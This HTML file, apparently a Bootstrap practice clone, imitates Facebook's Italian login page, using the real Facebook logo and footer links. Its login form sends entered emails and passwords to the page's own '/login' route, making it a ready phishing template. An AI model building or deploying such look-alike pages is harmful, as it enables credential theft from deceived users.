<!doctype html>
<html lang="en">

<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!-- Bootstrap CSS -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">

    <title>Hello, world!</title>
</head>

<body >
    
    <div class="bg-secondary bg-gradient" style="--bs-bg-opacity: .1;">
    <div class="container ">

        <div class="row align-items-center justify-content-around" style="min-height: 75vh;">

            <!-- ////logo -->
            <div class="col-12 col-lg-6" style="width: 400px">
                <div>
                    <img style="height: 106px;" src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="">
                </div>
                <h4>
                    Facebook ti aiuta a connetterti e rimanere in contatto con le persone della tua vita.
                </h4>

            </div>


            <!-- ////form -->
            <div class="col-12 col-lg-6  rounded p-4 bg-light shadow p-3 mb-5 bg-body rounded" style="width: 396px;">


                <form method="post" action="/login">
                    <div class="">

                        <input type="email" class="form-control " name="username" id="username" aria-describedby="email"
                            placeholder="E-mail o numero di telefono" style="padding: 14px 16px;">

                    </div>
                    <div class="mt-3 mb-3">
                        <input type="password" class="form-control " name="password" id="password" placeholder="Password"
                            style="padding: 14px 16px;">
                    </div>

                    <div class="d-grid gap-4">
                        <button type="submit" class="btn btn-primary p-2">Accedi</button>

                        <div class="text-center"><a href="#">Password dimenticata?</a></div>

                        <div
                            class="col-12 d-flex flex-column justify-content-center align-items-center border border-secondary">
                        </div>
                        <a class="col-6 mx-auto " href="/signup"><button class="btn btn-success " type="button" style="--bs-bg-opacity: .1;">Crea nuovo accaunt</button></a>


                    </div>



                </form>


            </div>

        </div>


    </div>
</div>



    <!-- footer -->
    <footer class="container  pt-4" style="height: 25vh;">
        <div class="container ">
            <ul class="list-inline ">
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Italiano</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">English(US)</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Romana</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Francais(France)</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Sardu</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Deutsch</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Espanol</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Sqhip</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">العربية</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none"href="">Portugues(Brasil)</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">हिन्दी</a></li>

            </ul>

            <div class="col-12 d-flex flex-column justify-content-center align-items-center border border-secondary"></div>


            <ul class="list-inline ">
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Iscriviti</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Accedi</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Messanger</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Facebook Lite</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Watch</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Luoghi</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Giochi</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Marketplace</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Facebook Pay</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none"href="">Oculus</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Portal</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Instagram</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Bulletin</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Nei dintorni</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Raccolte Fondi</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Servizi</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Centro informazioni sul voto</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Gruppi</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Informazioni</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Crea un'inserzione</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Crea una Pagina</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Sviluppatori</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Opportunità di lavoro</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Privacy</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Cookie</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Scegli tu</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Condizioni</a></li>
                <li class="list-inline-item "><a class="text-secondary text-decoration-none" href="">Centro assistenza</a></li>

            </ul>


        </div>



    </footer>






    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p"
        crossorigin="anonymous"></script>


    <style>
        footer>div>ul>*:hover {
            text-decoration: underline;
        }

        footer>div>ul>* {
            font-size: 0.8rem;
        }
    </style>



</body>

</html>
